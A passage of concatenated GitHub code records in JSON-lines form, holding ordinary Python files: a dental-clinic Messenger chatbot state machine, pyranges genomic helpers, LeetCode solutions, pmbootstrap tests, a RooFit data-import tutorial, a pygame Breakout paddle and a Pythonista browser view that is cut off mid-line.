{measurement_set['@id']}\n","repo_name":"IGVF-DACC/igvfd","sub_path":"src/igvfd/tests/test_types_file_set.py","file_name":"test_types_file_set.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"9556215658","text":"from transitions.extensions import GraphMachine\n\nfrom utils import send_text_message,send_button_message\n\nclass TocMachine(GraphMachine):\n def __init__(self, **machine_configs):\n self.machine = GraphMachine(\n model=self,\n **machine_configs\n )\n\n def is_going_to_state1(self, event):\n if event.get(\"message\"):\n if event['message'].get(\"text\"):\n text = event['message']['text']\n elif event['message'].get(\"attachments\"):\n text = 'go to state1'\n return text.lower() == 'go to state1'\n return False\n\n def is_going_to_state2(self, event):\n if event.get(\"message\"):\n text = event['message']['text']\n return text == '謝謝'\n return False\n\n def is_going_to_state3(self, event):\n if event.get(\"message\"):\n text = event['message']['text']\n return text.lower() == '嗨'\n elif event.get(\"postback\"):\n if event['postback']['title']=='詢問醫生問題':\n text = '詢問醫生問題'\n return text.lower() == '詢問醫生問題'\n elif event['postback']['title']=='預約看診':\n text = '預約看診'\n return text.lower() == '預約看診'\n return False\n\n def is_going_to_state4(self, event):\n if event.get(\"message\"):\n text = event['message']['text']\n return text.lower() == '服務項目'\n elif event.get(\"postback\"):\n if event['postback']['title']=='一般門診':\n text = '一般門診'\n return text.lower() == '一般門診'\n elif event['postback']['title']=='牙齒矯正':\n text = '牙齒矯正'\n return text.lower() == '牙齒矯正'\n return False\n\n def on_enter_state1(self, event):\n print(\"I'm entering state1\")\n\n sender_id = event['sender']['id']\n if event['message'].get(\"text\"):\n responese = send_text_message(sender_id, \"I'm entering state1\")\n elif event['message'].get(\"sticker_id\"):\n responese = send_text_message(sender_id, \"(๑´ڡ`๑)\")\n elif event['message'].get(\"attachments\"):\n responese = send_text_message(sender_id, \"收到,晚點再回復您\")\n self.go_back()\n\n def on_exit_state1(self):\n print('Leaving state1')\n\n def on_enter_state2(self, event):\n print(\"I'm entering state2\")\n\n sender_id = event['sender']['id']\n send_text_message(sender_id, \"不客氣~有任何問題都可以在聯絡\")\n self.go_back()\n\n def on_exit_state2(self):\n print('Leaving state2')\n\n def on_enter_state3(self, event):\n print(\"I'm entering state3\")\n\n sender_id = event['sender']['id']\n if event.get(\"message\"):\n send_text_message(sender_id, \"哈囉你好\")\n send_button_message(sender_id, \"請問您需要什麼服務呢?\", \"詢問醫生問題\", \"預約看診\")\n elif event.get(\"postback\"):\n text = event['postback']['payload']\n if text==\"button1\": send_text_message(sender_id, \"請寫下您的問題或傳送圖片,稍後在為您答覆\")\n elif text==\"button2\": send_text_message(sender_id, \"請寫下想要預約看診的日期時間,如果預約已經額滿會再另外通知\")\n self.go_back()\n\n def on_exit_state3(self):\n print('Leaving state3')\n\n def on_enter_state4(self, event):\n print(\"I'm entering state4\")\n\n sender_id = event['sender']['id']\n if event.get(\"message\"):\n send_button_message(sender_id, \"想要詢問哪方面的服務呢?\", \"一般門診\", \"牙齒矯正\")\n elif event.get(\"postback\"):\n text = event['postback']['payload']\n if text==\"button1\": send_text_message(sender_id, \"口腔整體性的評估及治療\\n蛀牙填補\\n洗牙\\n牙痛緊急處理\\n定期口腔檢查\")\n elif text==\"button2\": send_text_message(sender_id, \"藉由牙套及矯正線以期治療暴牙、戽斗、齒列擁擠、牙齒異位及各種的不正咬合\")\n self.go_back()\n\n def on_exit_state4(self):\n print('Leaving state4')\n\n \n","repo_name":"doreen05223/Messenger-Chatbot","sub_path":"fsm.py","file_name":"fsm.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"8996749464","text":"# pragma: no cover\nimport pandas as pd\n\nimport pyranges as pr\n\n\ndef pyrange_or_df(func):\n def extension(self, other, *args, **kwargs):\n df = func(self, other, *args, **kwargs)\n\n if kwargs.get(\"df\"):\n return df\n\n return pr.PyRanges(df)\n\n return extension\n\n\ndef pyrange_or_df_single(func):\n\n # from pyranges import PyRanges\n def extension(self, *args, **kwargs):\n df = func(self, *args, **kwargs)\n\n if kwargs.get(\"df\"):\n return df\n\n return pr.PyRanges(df)\n\n return extension\n\n\ndef _keep_transcript_with_most_exons(df):\n\n transcripts_with_most_exons = []\n\n for _, gdf in df.groupby(\"GeneID\"):\n\n max_exon = gdf.ExonNumber.max()\n max_transcript = gdf.loc[gdf.ExonNumber == max_exon].Transcript.iloc[0]\n\n max_rows = gdf.loc[gdf.Transcript == max_transcript]\n\n transcripts_with_most_exons.append(max_rows)\n\n return pd.concat(transcripts_with_most_exons).reset_index(drop=True)\n\n\ndef tss_or_tes(df, which, slack=0):\n\n assert which in \"tes tss\".split()\n\n if \"Feature\" not in df:\n raise Exception(\"No Feature information in object.\")\n\n _df = df[df.Feature == \"transcript\"]\n\n if which == \"tss\":\n _df = _tss(_df, slack)\n elif which == \"tes\":\n _df = _tes(_df, slack)\n\n return _df\n\n\ndef filter_transcripts(df, keep=\"most_exons\"):\n\n return _keep_transcript_with_most_exons(df)\n\n\ndef _tss(df, slack=0, drop_duplicates=True):\n\n # try:\n # df = self.df\n # except:\n # df = self\n\n tss_pos = df.loc[df.Strand == \"+\"]\n\n tss_neg = df.loc[df.Strand == \"-\"].copy()\n\n # pd.options.mode.chained_assignment = None\n tss_neg.loc[:, \"Start\"] = tss_neg.End\n\n # pd.options.mode.chained_assignment = \"warn\"\n tss = pd.concat([tss_pos, tss_neg], sort=False)\n tss[\"End\"] = tss.Start\n tss.End = tss.End + 1 + slack\n tss.Start = tss.Start - slack\n tss.loc[tss.Start < 0, \"Start\"] = 0\n\n if drop_duplicates:\n tss = tss.drop_duplicates(\"Chromosome Start End\".split())\n\n tss.index = range(len(tss))\n\n return tss\n\n\ndef _tes(df, slack=0, drop_duplicates=True):\n\n # df = self.df\n\n tes_pos = df.loc[df.Strand == \"+\"]\n\n tes_neg = df.loc[df.Strand == \"-\"].copy()\n\n # pd.options.mode.chained_assignment = None\n tes_neg.loc[:, \"Start\"] = tes_neg.End\n\n # pd.options.mode.chained_assignment = \"warn\"\n tes = pd.concat([tes_pos, tes_neg], sort=False)\n tes[\"Start\"] = tes.End\n tes.End = tes.End + 1 + slack\n tes.Start = tes.Start - slack\n tes.loc[tes.Start < 0, \"Start\"] = 0\n\n if drop_duplicates:\n tes = tes.drop_duplicates(\"Chromosome Start End\".split())\n\n tes.index = range(len(tes))\n\n return tes\n\n\nclass GenomicFeaturesMethods():\n\n pr = None\n\n def __init__(self, pr):\n\n self.pr = pr\n\n @pyrange_or_df_single\n def tss(self, transcripts=\"all\", drop_duplicate_tss=True, slack=0):\n\n pr = self.pr\n\n df = pr.df\n\n if transcripts == \"all\":\n pass\n elif transcripts == \"most_exons\":\n df = _keep_transcript_with_most_exons(df)\n\n if not pr.stranded:\n raise Exception(\n \"Cannot compute TSSes or TESes without strand info. Perhaps use slack() instead?\"\n )\n df = tss_or_tes(df, \"tss\", slack)\n\n if drop_duplicate_tss:\n df = df.drop_duplicates(\"Chromosome Start End\".split())\n\n df = df.drop([\"ExonNumber\", \"ExonID\"], 1)\n\n return df\n\n @pyrange_or_df_single\n def tes(self, transcripts=\"all\", drop_duplicate_tss=True, slack=0):\n\n pr = self.pr\n\n df = pr.df\n df = df.drop(\"ExonNumber\", 1)\n\n if transcripts == \"all\":\n pass\n elif transcripts == \"most_exons\":\n df = _keep_transcript_with_most_exons(df)\n\n if not pr.stranded:\n raise Exception(\n \"Cannot compute TSSes or TESes without strand info. Perhaps use slack() instead?\"\n )\n df = tss_or_tes(df, \"tes\", slack)\n\n if drop_duplicate_tss:\n df = df.drop_duplicates(\"Chromosome Start End\".split())\n\n df = df.drop([\"ExonNumber\", \"ExonID\"], 1)\n\n return df\n","repo_name":"xtmgah/pyranges","sub_path":"pyranges/genomicfeatures.py","file_name":"genomicfeatures.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"40467026","text":"class Solution(object):\n def findWords(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: List[str]\n \"\"\"\n rows = {\n 'qwertyuiop',\n 'asdfghjkl',\n 'zxcvbnm'\n }\n rows = {row + row.upper() for row in rows}\n result = []\n for word in words:\n if any(all(letter in row for letter in word)\n for row in rows):\n result.append(word)\n return result\n\n\nif __name__ == '__main__':\n print(Solution().findWords([\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]))\n \n","repo_name":"vitkarpenko/leetcode","sub_path":"500.py","file_name":"500.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"35870987402","text":"import os\nimport sys\nimport pytest\n\n# Import from parent directory\npmb_src = os.path.realpath(os.path.join(os.path.dirname(__file__) + \"/..\"))\nsys.path.insert(0, pmb_src)\nimport pmb.chroot.apk_static\nimport pmb.parse.apkindex\nimport pmb.helpers.logging\nimport pmb.parse.bootimg\n\n\n@pytest.fixture\ndef args(request):\n import pmb.parse\n sys.argv = [\"pmbootstrap.py\", \"chroot\"]\n args = pmb.parse.arguments()\n args.log = args.work + \"/log_testsuite.txt\"\n pmb.helpers.logging.init(args)\n request.addfinalizer(args.logfd.close)\n return args\n\n\ndef test_bootimg_invalid_path(args):\n with pytest.raises(RuntimeError) as e:\n pmb.parse.bootimg(args, \"/invalid-path\")\n assert \"Could not find file\" in str(e.value)\n\n\ndef test_bootimg_kernel(args):\n path = pmb_src + \"/test/testdata/bootimg/kernel-boot.img\"\n with pytest.raises(RuntimeError) as e:\n pmb.parse.bootimg(args, path)\n assert \"heimdall-isorec\" in str(e.value)\n\n\ndef test_bootimg_invalid_file(args):\n with pytest.raises(RuntimeError) as e:\n pmb.parse.bootimg(args, __file__)\n assert \"File is not an Android boot.img\" in str(e.value)\n\n\ndef test_bootimg_normal(args):\n path = pmb_src + \"/test/testdata/bootimg/normal-boot.img\"\n output = {\"base\": \"0x80000000\",\n \"kernel_offset\": \"0x00008000\",\n \"ramdisk_offset\": \"0x04000000\",\n \"second_offset\": \"0x00f00000\",\n \"tags_offset\": \"0x0e000000\",\n \"pagesize\": \"2048\",\n \"cmdline\": \"bootopt=64S3,32S1,32S1\",\n \"qcdt\": \"false\"}\n assert pmb.parse.bootimg(args, path) == output\n\n\ndef test_bootimg_qcdt(args):\n path = pmb_src + \"/test/testdata/bootimg/qcdt-boot.img\"\n output = {\"base\": \"0x80000000\",\n \"kernel_offset\": \"0x00008000\",\n \"ramdisk_offset\": \"0x04000000\",\n \"second_offset\": \"0x00f00000\",\n \"tags_offset\": \"0x0e000000\",\n \"pagesize\": \"2048\",\n \"cmdline\": \"bootopt=64S3,32S1,32S1\",\n \"qcdt\": \"true\"}\n assert pmb.parse.bootimg(args, path) == output\n","repo_name":"LibrePhone/pmbootstrap","sub_path":"test/test_bootimg.py","file_name":"test_bootimg.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"4005446326","text":"emp_list = []\n\ndef addition(x, y):\n total = x + y\n emp_list.append(total)\n\ndef substration(x, y):\n total = x - y\n emp_list.append(total)\n\ndef multiply(x, y):\n total = x * y\n emp_list.append(total)\n\ndef divide(x, y):\n total = x / y\n emp_list.append(total)\n\nfirst_num = float(input(\"Enter number: \"))\n\noperation_choice = input(\"What operation: \")\n\nsecond_num = float(input(\"Enter number: \"))\n\noperations = {\n \"addition\": addition,\n \"minus\": substration,\n \"times\": multiply,\n \"divide\": divide,\n}\n\noperations = operations[operation_choice]\n\noperations(first_num, second_num)\n\nprint(emp_list)","repo_name":"Danielwpt/Calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7746262611","text":"import logging\nimport stringcase\n\n\ndef RegisterCommonFilters(filtermap):\n \"\"\"\n Register filters that are NOT considered platform-generator specific.\n\n Codegen often needs standardized names, like \"method names are CamelCase\"\n or \"command names need-to-be-spinal-case\" so these filters are often\n generally registered on all generators.\n \"\"\"\n\n # General casing for output naming\n filtermap['camelcase'] = stringcase.camelcase\n filtermap['capitalcase'] = stringcase.capitalcase\n filtermap['constcase'] = stringcase.constcase\n filtermap['pascalcase'] = stringcase.pascalcase\n filtermap['snakecase'] = stringcase.snakecase\n filtermap['spinalcase'] = stringcase.spinalcase\n","repo_name":"bekencorp/armino","sub_path":"components/matter/connectedhomeip/scripts/idl/generators/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"57"} +{"seq_id":"70992081137","text":"#-*-coding:utf-8-*-\n__author__ = 'Lenovo'\nfrom PIL import Image\nfrom pylab import *\nfrom imtools import *\nfigure()\nim = array(Image.open(get_imlist(os.getcwd())[0]).convert('L'))\nimshow(im)\n\nx = [100,100,400,400]\ny = [200,500,200,500]\n\nplot(x,y,'r*')\n\nplot(x[:2],y[:2])\n\n\ntitle('zebrafish plotting')\n\nshow()\n","repo_name":"liuyun1217/SibetProject","sub_path":"myplot.py","file_name":"myplot.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9306185484","text":"import locale\n\nfrom quandoo.QuandooModel import QuandooModel\n\n\nclass Customer(QuandooModel):\n\n def __init__(self, data, agent):\n self.id = data[\"id\"]\n self.firstName = data[\"firstName\"]\n self.lastName = data[\"lastName\"]\n self.email = data[\"email\"]\n self.phoneNumber = data[\"phoneNumber\"]\n\n super().__init__(data)\n\n def to_json(self):\n return {\n \"firstName\": self.firstName,\n \"lastName\": self.lastName,\n \"emailAddress\": self.email,\n \"phoneNumber\": self.phoneNumber,\n \"locale\": locale.getdefaultlocale()[0],\n \"country\": locale.getdefaultlocale()[0][-2:]\n }\n","repo_name":"fraser-langton-student/Quandoo","sub_path":"quandoo/Customer.py","file_name":"Customer.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"21610267061","text":"import pygame\nfrom math import ceil\n\nWHITE = (255, 255, 255)\n\n\nclass Paddle:\n def __init__(self, window):\n self.window = window\n self.surface = pygame.Surface((ceil(window.get_width() * 0.1), ceil(window.get_height() * 0.013)))\n self.surface.fill(WHITE)\n self.w = self.surface.get_width()\n self.h = self.surface.get_height()\n self.pos = [pygame.mouse.get_pos()[0], int(window.get_height() * 0.8)]\n self.pos_offset = 10\n self.col = {}\n self.set_col()\n\n def render_col(self):\n i = pygame.Surface([1, 1])\n i.fill((0, 200, 0))\n for point in self.col.keys():\n self.window.blit(i, point)\n\n def mouse(self, point):\n self.pos[0] = point[0]\n if self.pos[0] >= self.window.get_width() - self.w:\n self.pos[0] = self.window.get_width() - self.w\n pygame.mouse.set_pos(self.pos)\n self.set_col()\n\n def set_col(self):\n self.col = {}\n for x in range(self.pos[0], self.pos[0] + self.w // 2):\n self.col[(x, self.pos[1])] = 'left'\n for x in range(self.pos[0] + (self.w // 2), self.pos[0] + self.w):\n self.col[(x, self.pos[1])] = 'right'\n","repo_name":"glacay30/arcade-pygames","sub_path":"Breakout/paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"18441134960","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n prev, slow, fast = head, head, head\n while fast and fast.next:\n fast = fast.next.next\n cur_slow, slow = slow, slow.next\n cur_slow.next, prev = prev, cur_slow\n if fast:\n slow = slow.next\n while slow:\n if slow.val != prev.val:\n return False\n slow = slow.next\n prev = prev.next\n return True\n","repo_name":"huytq000605/GrindLC","sub_path":"Linked List/Palindrome Linked List/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"34422414331","text":"from bitcoin import privtopub, pubkey_to_address\nfrom gec.contrib.bitcoin import gen_key_pair, gen_random_number, gen_pub_key, gen_address\n\n\ndef test_key():\n priv, pub = gen_key_pair()\n assert pub == privtopub(priv)\n\n\ndef test_addr():\n key = gen_random_number()\n pub = gen_pub_key(key)\n addr = gen_address(key)\n assert addr == pubkey_to_address(pub)\n","repo_name":"RyanKung/gec","sub_path":"tests/test_bitcoin_contrib.py","file_name":"test_bitcoin_contrib.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"10276500822","text":"## \\file\n## \\ingroup tutorial_roofit\n## \\notebook\n## 'BASIC FUNCTIONALITY' RooFit tutorial macro #102\n## Importing data from ROOT TTrees and THx histograms\n##\n## \\macro_image\n## \\macro_code\n## \\macro_output\n##\n## \\date February 2018\n## \\authors Clemens Lange, Wouter Verkerke (C version)\n\nimport ROOT\nfrom array import array\n\n\ndef makeTH1():\n\n # Create ROOT ROOT.TH1 filled with a Gaussian distribution\n\n hh = ROOT.TH1D(\"hh\", \"hh\", 25, -10, 10)\n for i in range(100):\n hh.Fill(ROOT.gRandom.Gaus(0, 3))\n return hh\n\n\ndef makeTTree():\n # Create ROOT ROOT.TTree filled with a Gaussian distribution in x and a\n # uniform distribution in y\n\n tree = ROOT.TTree(\"tree\", \"tree\")\n px = array(\"d\", [0])\n py = array(\"d\", [0])\n tree.Branch(\"x\", px, \"x/D\")\n tree.Branch(\"y\", py, \"y/D\")\n for i in range(100):\n px[0] = ROOT.gRandom.Gaus(0, 3)\n py[0] = ROOT.gRandom.Uniform() * 30 - 15\n tree.Fill()\n return tree\n\n\n############################\n# Importing ROOT histograms\n############################\n# Import ROOT TH1 into a RooDataHist\n# ---------------------------------------------------------\n# Create a ROOT TH1 histogram\nhh = makeTH1()\n\n# Declare observable x\nx = ROOT.RooRealVar(\"x\", \"x\", -10, 10)\n\n# Create a binned dataset that imports contents of ROOT.TH1 and associates\n# its contents to observable 'x'\ndh = ROOT.RooDataHist(\"dh\", \"dh\", [x], Import=hh)\n\n# Plot and fit a RooDataHist\n# ---------------------------------------------------\n# Make plot of binned dataset showing Poisson error bars (RooFit default)\nframe = x.frame(Title=\"Imported ROOT.TH1 with Poisson error bars\")\ndh.plotOn(frame)\n\n# Fit a Gaussian p.d.f to the data\nmean = ROOT.RooRealVar(\"mean\", \"mean\", 0, -10, 10)\nsigma = ROOT.RooRealVar(\"sigma\", \"sigma\", 3, 0.1, 10)\ngauss = ROOT.RooGaussian(\"gauss\", \"gauss\", x, mean, sigma)\ngauss.fitTo(dh, PrintLevel=-1)\ngauss.plotOn(frame)\n\n# Plot and fit a RooDataHist with internal errors\n# ---------------------------------------------------------------------------------------------\n\n# If histogram has custom error (i.e. its contents is does not originate from a Poisson process\n# but e.g. is a sum of weighted events) you can data with symmetric 'sum-of-weights' error instead\n# (same error bars as shown by ROOT)\nframe2 = x.frame(Title=\"Imported ROOT.TH1 with internal errors\")\ndh.plotOn(frame2, DataError=\"SumW2\")\ngauss.plotOn(frame2)\n\n# Please note that error bars shown (Poisson or SumW2) are for visualization only, the are NOT used\n# in a maximum likelihood fit\n#\n# A (binned) ML fit will ALWAYS assume the Poisson error interpretation of data (the mathematical definition\n# of likelihood does not take any external definition of errors). Data with non-unit weights can only be correctly\n# fitted with a chi^2 fit (see rf602_chi2fit.py)\n#\n# Importing ROOT TTrees\n# -----------------------------------------------------------\n# Import ROOT TTree into a RooDataSet\n\ntree = makeTTree()\n\n# Define 2nd observable y\ny = ROOT.RooRealVar(\"y\", \"y\", -10, 10)\n\n# Construct unbinned dataset importing tree branches x and y matching between branches and ROOT.RooRealVars\n# is done by name of the branch/RRV\n#\n# Note that ONLY entries for which x,y have values within their allowed ranges as defined in\n# ROOT.RooRealVar x and y are imported. Since the y values in the import tree are in the range [-15,15]\n# and RRV y defines a range [-10,10] this means that the ROOT.RooDataSet\n# below will have less entries than the ROOT.TTree 'tree'\n\nds = ROOT.RooDataSet(\"ds\", \"ds\", {x, y}, Import=tree)\n\n# Use ascii import/export for datasets\n# ------------------------------------------------------------------------------------\n\n\ndef write_dataset(ds, filename):\n # Write data to output stream\n outstream = ROOT.std.ofstream(filename)\n # Optionally, adjust the stream here (e.g. std::setprecision)\n ds.write(outstream)\n outstream.close()\n\n\nwrite_dataset(ds, \"rf102_testData.txt\")\n\n# Read data from input stream. The variables of the dataset need to be supplied\n# to the RooDataSet::read() function.\nprint(\"\\n-----------------------\\nReading data from ASCII\")\ndataReadBack = ROOT.RooDataSet.read(\n \"rf102_testData.txt\",\n [x, y], # variables to be read. If the file has more fields, these are ignored.\n \"D\", # Prints if a RooFit message stream listens for debug messages. Use Q for quiet.\n)\n\ndataReadBack.Print(\"V\")\n\nprint(\"\\nOriginal data, line 20:\")\nds.get(20).Print(\"V\")\n\nprint(\"\\nRead-back data, line 20:\")\ndataReadBack.get(20).Print(\"V\")\n\n\n# Plot data set with multiple binning choices\n# ------------------------------------------------------------------------------------\n# Print number of events in dataset\nds.Print()\n\n# Print unbinned dataset with default frame binning (100 bins)\nframe3 = y.frame(Title=\"Unbinned data shown in default frame binning\")\nds.plotOn(frame3)\n\n# Print unbinned dataset with custom binning choice (20 bins)\nframe4 = y.frame(Title=\"Unbinned data shown with custom binning\")\nds.plotOn(frame4, Binning=20)\n\nframe5 = y.frame(Title=\"Unbinned data read back from ASCII file\")\nds.plotOn(frame5, Binning=20)\ndataReadBack.plotOn(frame5, Binning=20, MarkerColor=\"r\", MarkerStyle=5)\n\n# Draw all frames on a canvas\nc = ROOT.TCanvas(\"rf102_dataimport\", \"rf102_dataimport\", 800, 800)\nc.Divide(3, 2)\nc.cd(1)\nROOT.gPad.SetLeftMargin(0.15)\nframe.GetYaxis().SetTitleOffset(1.4)\nframe.Draw()\nc.cd(2)\nROOT.gPad.SetLeftMargin(0.15)\nframe2.GetYaxis().SetTitleOffset(1.4)\nframe2.Draw()\nc.cd(4)\nROOT.gPad.SetLeftMargin(0.15)\nframe3.GetYaxis().SetTitleOffset(1.4)\nframe3.Draw()\nc.cd(5)\nROOT.gPad.SetLeftMargin(0.15)\nframe4.GetYaxis().SetTitleOffset(1.4)\nframe4.Draw()\nc.cd(6)\nROOT.gPad.SetLeftMargin(0.15)\nframe4.GetYaxis().SetTitleOffset(1.4)\nframe5.Draw()\n\nc.SaveAs(\"rf102_dataimport.png\")\n","repo_name":"root-project/root","sub_path":"tutorials/roofit/rf102_dataimport.py","file_name":"rf102_dataimport.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":2290,"dataset":"github-code","pt":"57"} +{"seq_id":"29494909917","text":"# coding: utf-8\n\nimport console, json, os, pickle, ui, urlparse\n\nfilename_bookmarks = 'bookmarks.json'\nfilename_history = 'history.txt'\n\nclass BrowserView (ui.View):\n\n\tdef evaluate_javascript(self, js):\n\t\treturn self['webview'].evaluate_javascript(js)\n\t\n\tdef get_title(self):\n\t\treturn self.evaluate_javascript('document.title')\n\n\tdef get_url(self):\n\t\treturn self.evaluate_javascript('window.location.href')\n\n\tdef parse_url(self, url):\n\t\treturn urlparse.urlparse(url).netloc\n\n\tdef set_url(self, url=None):\n\t\turl = url or self.get_url()\n\t\taddr_bar = self['controlpanel']['addressbar']\n\t\tif self.addressbar_is_editing:\n\t\t\taddr_bar.text = url\n\t\t\taddr_bar.alignment = ui.ALIGN_LEFT\n\t\telse:\n\t\t\taddr_bar.text = self.parse_url(url)\n\t\t\taddr_bar.alignment = ui.ALIGN_CENTER\n\n\tdef load_url(self, url):\n\t\tif '.' not in url:\n\t\t\turl = 'http://www.google.com/search?q={}'.format(url.replace(' ', '+'))\n\t\telif urlparse.urlparse(url).netloc == '':\n\t\t\turl = 'http://'+url\n\t\tself['webview'].load_url(url)\n\n\tdef load_bookmarks(self, filename=filename_bookmarks):\n\t\ttry:\n\t\t\twith open(filename, 'r+') as f:\n\t\t\t\tbookmarks = json.load(f)\n\t\texcept IOError as e:\n\t\t\tbookmarks = {}\n\t\t\twith open(filename, 'w+') as f:\n\t\t\t\tjson.dump(bookmarks, f, indent=4)\n\t\treturn bookmarks\n\n\tdef load_history(self, filename=filename_history):\n\t\ttry:\n\t\t\twith open(filename, 'r+') as f:\n\t\t\t\thistory = pickle.load(f)\n\t\texcept (IOError, IndexError) as e:\n\t\t\thistory = []\n\t\t\twith open(filename, 'w+') as f:\n\t\t\t\tpickle.dump(history, f)\n\t\treturn history\n\n\tdef init_buttons(self):\n\t\tfor subview in self['controlpanel'].subviews:\n\t\t\tsubview.action = self.button_tapped\n\n\tdef init_addressbar(self):\n\t\taddressbar = self['controlpanel']['addressbar']\n\t\taddressbar.autocapitalization_type = ui.AUTOCAPITALIZE_NONE\n\t\taddressbar.keyboard_type = ui.KEYBOARD_WEB_SEARCH\n\t\taddressbar.clear_button_mode = 'while_editing'\n\t\taddressbar.font = ('<system>', addressbar.height*0.4)\n\t\taddressbar.delegate = self\n\t\taddressbar.action = None\n\n\tdef init_webbrowser(self):\n\t\tweb = self['webview']\n\t\tweb.load_url('https://omz-forums.appspot.com/pythonista')\n\t\tweb.delegate = self\n\t\t\n\tdef init_size(self):\n\t\t# initialize with correct size when landscape\n\t\torientation = ui.WebView(frame=(0,0,100,200)).eval_js('window.orientation')\n\t\tif orientation in (-90, 90):\n\t\t\tself.frame = (0, 0, self.height, self.width)\n\n\tdef did_load(self):\n\t\tself.init_buttons()\n\t\tself.init_webbrowser()\n\t\tself.init_addressbar()\n\t\tself.init_size()\n\t\tself.flex = 'WH'\n\t\tself.bookmarks = self.load_bookmarks()\n\t\tself.history = self.load_history()\n\t\tself.addressbar_is_editing = False\n\t\tself.webpage_has_loaded = False\n\t\tself.favourite_images = {True :ui.Image.named('ionicons-ios7-star-32'),\n\t\tFalse:ui.Image.named('ionicons-ios7-star-outline-32')}\n\n\tdef save_history(self, filename=filename_history):\n\t\twith open(filename, 'w') as f:\n\t\t\turl = self.get_url()\n\t\t\tif url in self.history:\n\t\t\t\tself.history.remove(url)\n\t\t\tself.history.append(url)\n\t\t\tf.seek(0)\n\t\t\tpickle.dump(self.history, f)\n\t\t\t\n\tdef clear_history(self, sender, filename=filename_history):\n\t\twith open(filename, 'w') as f:\n\t\t\tself.history = []\n\t\t\tf.seek(0)\n\t\t\tpickle.dump(self.history, f)\n\t\t\tsender.superview.superview['history'].data_source.items = self.history\n\t\t\tsender.superview.superview['history'].reload()\n\n\tdef save_bookmark(self, filename=filename_bookmarks):\n\t\twith open(filename, 'w') as f:\n\t\t\turl = self.get_url()\n\t\t\ttitle = self.get_title() or self.parse_url(url)\n\t\t\tself.bookmarks[title] = url\n\t\t\tf.seek(0)\n\t\t\tjson.dump(self.bookmarks, f, indent=4)\n\t\t\tself['controlpanel']['favourite'].image = self.favourite_images[True]\n\n\tdef remove_bookmark(self, title=None, filename=filename_bookmarks):\n\t\twith open(filename, 'w') as f:\n\t\t\ttitle = title or self.get_title()\n\t\t\tdel self.bookmarks[title]\n\t\t\tf.seek(0)\n\t\t\tjson.dump(self.bookmarks, f, indent=4)\n\t\t\tself['controlpanel']['favourite'].image = self.favourite_images[False]\n\n\tdef popup_menu(self):\n\t\tpopup = ui.View(name='menu', frame=(0, 0, 320, 500))\n\t\t\n\t\ttoolbar = ui.View(frame=(-5, 0, 330, 100), name='toolbar')\n\t\ttoolbar.border_width = 0.5\n\t\ttoolbar.border_color = '#B2B2B2'\n\t\t\n\t\tlabel = ui.Label()\n\t\tlabel.text = 'Bookmarks'\n\t\tlabel.alignment = ui.ALIGN_CENTER\n\t\tlabel.frame = (0, 0, 320, 50)\n\t\tlabel.name = 'title'\n\t\t\n\t\tsegment_ctrl = ui.SegmentedControl(name='segctrl')\n\t\tsegment_ctrl.segments = ['Bookmarks', 'History']\n\t\tsegment_ctrl.width = 170\n\t\tsegment_ctrl.center = popup.center\n\t\tsegment_ctrl.y = label.height\n\t\tsegment_ctrl.selected_index = 0\n\t\tsegment_ctrl.action = self.bookmarks_or_history\n\t\t\n\t\tbutton = ui.Button()\n\t\tbutton.frame = (segment_ctrl.x*3.5, segment_ctrl.y, 60, 30)\n\t\tbutton.font = ('<system>', 15)\n\t\tbutton.title= 'Clear'\n\t\tbutton.name = 'clear'\n\t\tbutton.action = self.clear_history\n\t\tbutton.hidden = True\n\t\t\n\t\ttoolbar.add_subview(label)\n\t\ttoolbar.add_subview(segment_ctrl)\n\t\ttoolbar.add_subview(button)\n\t\t\n\t\tpopup.add_subview(toolbar)\n\t\tdata_source = ui.ListDataSource(sorted(self.bookmarks.keys()))\n\t\tpopup.add_subview(self.list_bookmarks_and_history(data_source, width=320,height=toolbar.superview.height-toolbar.height, y=toolbar.height, name='bookmarks'))\n\t\tx, y = self['controlpanel']['bookmarks'].center\n\t\tpopup.present('popover', popover_location=(x, y), hide_title_bar=True)\n\n\tdef bookmarks_or_history(self, sender):\n\t\ttoolbar = sender.superview\n\t\tif sender.selected_index == 0:\n\t\t\ttoolbar['clear'].hidden = True \n\t\t\ttoolbar['title'].text = 'Bookmarks'\n\t\t\tdata_source = ui.ListDataSource(sorted(self.bookmarks.keys()))\n\t\t\ttv = self.list_bookmarks_and_history(data_source, width=320, height=toolbar.superview.height-toolbar.height, y=toolbar.height, 